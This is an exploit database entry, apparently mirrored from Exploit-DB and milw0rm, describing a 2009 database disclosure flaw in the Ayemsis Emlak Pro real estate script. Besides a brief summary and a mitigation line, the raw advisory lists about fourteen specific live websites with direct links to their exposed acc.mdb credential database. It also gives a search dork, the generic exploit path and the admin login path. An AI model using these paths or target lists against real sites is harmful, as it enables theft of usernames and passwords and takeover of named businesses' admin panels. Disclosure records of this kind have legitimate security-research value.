Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability

vendor:

Emlak Pro

by:

ByALBAYX

9.3

CVSS

HIGH

Database Disclosure Vulnerability

200

CWE

Product Name: Emlak Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability

Ayemsis Emlak Pro is vulnerable to a database disclosure vulnerability. An attacker can exploit this vulnerability by accessing the acc.mdb file located in the Pack/bad/ directory. This file contains the database information for the application, including usernames and passwords. The attacker can then use this information to gain access to the application.

Mitigation:

The acc.mdb file should be removed from the Pack/bad/ directory and access to the directory should be restricted.

Source

Exploit-DB raw data:

###########################################################################
#---------C4TEAM.ORG------------ByALBAYX------------C4TEAM.ORG------------#
###########################################################################

#Author   : ByALBAYX

#Website  : WWW.C4TEAM.ORG

#Contact  : Byalbayx[At]Gmail[Dot]Com

###########################################################################
Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability

#Script        : Ayemsis Emlak Pro
#Download  : Null
#Dork         : Ayemsis Emlak Pro
#Demo       :

http://www.caliemlak.com/Pack/bad/acc.mdb

http://www.kameraemlak.com/Pack/bad/acc.mdb

http://www.seferihisaremlakrehberi.com/Pack/bad/acc.mdb

http://www.emlakgezegeni.com/Pack/bad/acc.mdb

http://www.favorigayrimenkul.com/Pack/bad/acc.mdb

http://www.agmestate.com/Pack/bad/acc.mdb

http://www.boran-emlak.com/Pack/bad/acc.mdb

http://www.nominalemlak.com/Pack/bad/acc.mdb

http://www.gunesemlak.net/Pack/bad/acc.mdb

http://www.favorigayrimenkul.com/Pack/bad/acc.mdb

http://www.aydanbilisim.com.tr/Demo/EmlakPro/Pack/bad/acc.mdb

http://www.boran-emlak.com/Pack/bad/acc.mdb

http://agmestate.com/Pack/bad/acc.mdb

http://www.mobilrealestate.net/Pack/bad/acc.mdb


###########################################################################

#Exploits :

#--=[DATABASE DISCLOSURE]=--

http://www.siteadi.com/[PATH]/Pack/bad/acc.mdb

#Admin Login

#http://www.siteadi.com/[PATH]/panel/Login.asp

[~]Ä°ÅŸinize BaqÄ±n :=)

#Greetz For Kralz & Silent & B~S & C4team.OrG Members
###########################################################################

# milw0rm.com / Str0ke

# milw0rm.com [2009-01-05]